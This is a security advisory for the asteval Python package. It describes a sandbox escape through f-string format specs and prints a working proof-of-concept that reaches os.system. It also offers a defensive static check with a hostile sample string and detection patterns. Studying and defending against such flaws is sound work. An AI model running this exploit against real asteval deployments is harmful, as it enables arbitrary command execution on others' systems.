Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade asteval to version 1.0.6 or higher.
asteval is a safe, minimalistic evaluator of Python expressions using the ast module.
Affected versions of this package are vulnerable to Exposed Dangerous Method or Function through the on_formattedvalue function. An attacker can manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val) to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.
```python
from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
#     ga
def pwn():
    try:
        f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
    except Exception as ga:
        ga = ga.obj
        sub = ga(dict.mro()[1],"__subclasses__")()
        importer = None
        for i in sub:
            if "BuiltinImporter" in str(i):
                importer = i.load_module
                break
        os = importer("os")
        os.system("whoami")
# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works
pwn()
"""
aeval(code)
```
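Upgrading to 1.0.6 is the fix; for deployments that cannot upgrade immediately, the following is an added example (not Snyk's or asteval's code) of a static pre-check run over expression source before it reaches the Interpreter. It flags f-string format specs whose literal text carries a brace or a dunder name, the shape that the fmt.format(__fstring__=val) sink above turns into attribute access; the function names and the sample inputs are this example's own.

```python
import ast

# Added example, not Snyk's or asteval's own code: a static pre-flight check
# for expression source before it is handed to an un-upgraded asteval
# Interpreter. It only inspects literal format specs, not values computed at
# run time, so it is a compensating control alongside the version upgrade,
# not a replacement for it.

def _literal_spec_text(spec: ast.AST) -> str:
    """Concatenate the string constants found inside a format_spec JoinedStr."""
    return "".join(
        n.value for n in ast.walk(spec)
        if isinstance(n, ast.Constant) and isinstance(n.value, str)
    )

def suspicious_format_specs(source: str) -> list:
    """Return the literal text of every f-string format spec in `source` that
    contains a brace or a double underscore; an empty list means none found."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.FormattedValue) and node.format_spec is not None:
            text = _literal_spec_text(node.format_spec)
            # A literal brace lets the spec become a replacement field when
            # asteval concatenates it into '{__fstring__:<spec>}'; a dunder
            # name is what such a field would reach for.
            if "{" in text or "}" in text or "__" in text:
                findings.append(text)
    return findings

# Constructed samples: the first mirrors the advisory's shape (\x7B and \x7D
# are the escaped braces that survive into the spec string); the second is
# ordinary formatting that must pass unflagged.
HOSTILE_SAMPLE = r'''f"{obj:'\x7B__fstring__.__getattribute__.s\x7D'}"'''
BENIGN_SAMPLE = 'f"{value:>10.3f} and {name!r:^20}"'

if __name__ == "__main__":
    print(suspicious_format_specs(HOSTILE_SAMPLE))  # one finding
    print(suspicious_format_specs(BENIGN_SAMPLE))   # []
```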